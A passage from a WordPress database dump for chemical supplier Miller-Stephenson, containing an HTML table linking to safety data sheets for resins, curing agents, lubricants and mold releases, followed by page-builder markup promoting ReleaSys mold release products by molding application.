href="https://www.miller-stephenson.com/wp-content/uploads/sds/1004F.pdf">EPON RESIN 1004F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720.pdf">MS-720</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/787.pdf">MS-787</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/145W.pdf">MS-145W</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRTgrease.pdf">NRT GREASE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1007F.pdf">EPON RESIN 1007F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720.pdf">MS-720M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/797.pdf">MS-797</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/145W4.pdf">MS-145W-4</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/PFPEoilsXP.pdf">PFPE OIL W/SOLUBLE ADDITIVE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1031.pdf">EPON RESIN 1031</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720L.pdf">MS-720L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/110XB.pdf">MS-110XB</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/153BN.pdf">MS-153BN</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PFPE-Grease-with-Soluble-Additive.pdf">pfpe-grease-with-soluble-additive</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1050.pdf">EPON RESIN 1050</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/725.pdf">MS-725</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1010.pdf">MS-1010</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/A0305B.pdf">A0305B</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/10X.pdf">PFPE Oils</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1163.pdf">EPON RESIN 1163</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/725.pdf">MS-725M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/2010.pdf">MS-2010</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1206A.pdf">K1206A</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/TS4.pdf">TS4 SEALANT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8021.pdf">EPON RESIN 8021</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/02/3100MD-3170MD-16.pdf">MS-31XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Y0717A.pdf">Y0717A</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPF.pdf">VACUUM PUMP FLUID</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8132.pdf">EPON RESIN 8132</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3200MD.pdf">MS-32XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT960.pdf">Vydax NRT 960</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPFXP.pdf">VACUUM PUMP FLUID XP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8280.pdf">EPON RESIN 8280</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730L.pdf">MS-730L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XP35.pdf">X-P35</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA5.pdf">RA/IPA-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHT500AF.pdf">XHT-500AF</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8281.pdf">EPON RESIN 8281</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805B.pdf">H0805B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA15.pdf">RA/IPA-15</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHToils.pdf">XHT-OILS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58005.pdf">EPON RESIN 58005</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H1112B.pdf">H1112B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA.pdf">DryFilm RA/IPA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTAC.pdf">XHT-AC, ACX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58034.pdf">EPON RESIN 58034</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/745.pdf">MS-745</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSDG.pdf">Vertrel SDG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RA.pdf">DryFilm RA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/XHT-BD-series.pdf">XHT BD, BDZ, BDX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1510.pdf">EPONEX 1510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSFR.pdf">Vertrel SFR</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-RED-16.pdf">MS-143TE Red</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTS.pdf">XHT-S, SX, SZ</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/WD510.pdf">EPI-REZ WD-510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750M</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/485G-16.pdf">MS-48G RFI Nickel</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-1.0-16.pdf">MS-143TE-1.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL2E.pdf">GPL 2E SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3522W60.pdf">EPI-REZ 3522-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.0-16.pdf">MS-143TE-2.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/fluoroguard.pdf">PCA,PRO,SG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5003W55.pdf">EPI-REZ 5003-W-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.5-16.pdf">MS-143TE-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5520W60.pdf">EPI-REZ 5520-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755L.pdf">MS-755L</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-5-16.pdf">MS-143TE-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5522WY55.pdf">EPI-REZ 5522-WY-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-10-16.pdf">MS-143TE-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3015.pdf">EPIKURE 3015</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-82-16.pdf">ReleaSys 82</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3046.pdf">EPIKURE 3046</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-85-16.pdf">ReleaSys 85</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3055.pdf">EPIKURE 3055</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-88-16.pdf">ReleaSys 88</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3115.pdf">EPIKURE 3115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-89-16.pdf">ReleaSys 89</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/04/3125.pdf">EPIKURE 3125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8200-16.pdf">ReleaSys 8200</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/3140-1.pdf">EPIKURE 3140</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8500-16.pdf">ReleaSys 8500</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3155.pdf">EPIKURE 3155</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8800-16.pdf">ReleaSys 8800</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3164.pdf">EPIKURE 3164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8900-16.pdf">ReleaSys 8900</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3223.pdf">EPIKURE 3223</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122AVL-16.pdf">MS-122AVL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3234.pdf">EPIKURE 3234</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122SEL-16.pdf">MS-122SEL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3245.pdf">EPIKURE 3245</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/110XN-16.pdf">MS-110XN</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-BLUE-16.pdf">MS-143TE Blue</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3253.pdf">EPIKURE 3253</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3270.pdf">EPIKURE 3270</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3271.pdf">EPIKURE 3271</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3274.pdf">EPIKURE 3274</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3282.pdf">EPIKURE 3282</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3290.pdf">EPIKURE 3290</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3295.pdf">EPIKURE 3295</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/530N-17.pdf">MS-530N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/W.pdf">CURING AGENT W</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/532N-16.pdf">MS-532N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K54.pdf">ANCAMINE K54</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/538N-17.pdf">MS-538N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K61B.pdf">ANCAMINE K61B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/539N-16.pdf">MS-539N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BDMA.pdf">BDMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/550N-16.pdf">MS-550N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/552N-16.pdf">MS-552N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/580N-16.pdf">MS-580N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/582N-16.pdf">MS-582N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/747-16.pdf">MS-747</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2017-06-08 15:39:35', '2017-06-08 15:39:35', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4510, 2, '2017-06-08 16:36:16', '2017-06-08 16:36:16', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[button text="ADVANCED COMPOSITES" target=""Modern composites and fiber-reinforced materials""]\n\n[button text="ROTATIONAL PLASTIC"]\n\n[button text="POLYURETHANE"]\n\n[button text="RUBBER-SILICONE-ELASTOMER"]\n\n[button text="INJECTION PLASTICS"]\n\n[button text="FIBERGLASS"]\n\n[button text="PRECAST /  REINFORCED CONCRETE"]\n\n[button text="CUSTOM FORMULATIONS"]\n\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide 